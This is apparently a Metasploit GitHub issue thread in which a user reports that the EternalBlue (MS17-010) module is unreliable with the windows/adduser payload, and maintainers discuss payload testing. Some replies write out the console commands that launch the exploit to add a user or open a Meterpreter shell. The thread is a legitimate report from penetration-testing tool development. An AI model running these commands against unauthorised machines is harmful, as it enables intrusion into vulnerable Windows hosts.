How'd you do it?
use exploit/windows/smb/ms17_010_eternalblueset payload windows/adduserset RHOSTS <vulnerable ip addr>runWith that payload it should add a user to the target vulnerable machine.
It does not always work properly.
Framework: 5.0.2-dev
Console : 5.0.2-dev
Kali Linux 2019.1 AMD64
I also would like to add:
The exploit does work fine without the payload, just adding the payload it becomes extremely unreliable.
Yeah, it's known that certain payloads are more reliable. The module description hints at that, but it was mostly in testing where we noticed.
Sorry I don't have a better answer.
I totally understand that it may not work 100% of the time, as specifically this type of exploit would require the PC to execute a very specific part of the overflowed buffer. However I did not find an issue on here for this, so I figured I would report it in case anyone else happened to be having this issue. I searched online for hours trying to figure out if I was doing something wrong and found almost nothing related to attaching payloads to this exploit.
I don't think you're doing anything wrong. Perhaps certain payloads should be blacklisted. I recommend sticking with a proven Meterpreter payload and doing post-exploitation after.
A way to sort by known good payloads for an exploit would also be extremely helpful with this. I know this would take a lot of work testing all of the payloads with all of the exploits, however I think the benefits would be worth it.
On another note, the payload I used did not cause any system instability with the VM I was using. But rather just nothing happened, I did get it to work once, but never again.
Paging @bwatters-r7. Maybe we can incorporate MS17-010 testing into our current payload testing? I'm iffy on the predictability, but maybe we can survey it more scientifically.
When we first had the 17-010 push, I found that our payload testing infrastructure as it was could not really test it. It everything failed when I tested 17-010 in parallel. At the time, I wound up having to write a custom wrapper for the tests to spin up each target and test it in series (I still have no idea why it failed in parallel). That means to test 17-010 with a single payload against our normal target set, it takes about 10-15 _hours_ rather than the normal 15-20 _minutes_. If we wanted to cherry-pick some payloads/targets/versions we could do it in an hour or two, depending on the number of payloads/targets/versions, but I have never set it up as default testing because of the huge time requirement.
Hrm..... After thinking this through a bit..... If this is something that's really important, the test in series takes less power, so I could set up a separate range of VMs and crawl through in the background while other tests ran...... The server I use now is powerful enough to run the lighter tests as a group, unlike the one back when we were testing this originally. It would take some time to set up, but if we ran it on nights where we we not running the full x86 bin tests, it _should_ work.
Can you give me a set of 17-010 modules, payloads and windows versions you'd like tested? I can't promise anything soon unless it gets flagged as a priority, but I can start looking at getting the VMs built on my next baseline-builder run.
I think exploit/windows/smb/ms17_010_eternalblue, windows/x64/meterpreter/reverse_tcp, and Windows Server 2008 R2 would be a good start.
@CorruptComputer: What exactly do you mean by working fine without a payload?
Sorry for the late reply on this. I was meaning if you select no payload with the exploit, for example:
use exploit/windows/smb/ms17_010_eternalblueset RHOSTS <vulnerable ip addr>runThis will still spawn a meterpreter shell for the victim machine.
I don't think incorporating a specific range of tests is the solution we're looking for here. It seems like there's a broader need to help users understand which payloads are and are not compatible with which exploits (and why). Rather than adding testing overhead that doesn't solve the problem, I'm going to close this but stick it under a "usability" label we're tracking internally to plan changes that should make MSF more intuitive for users.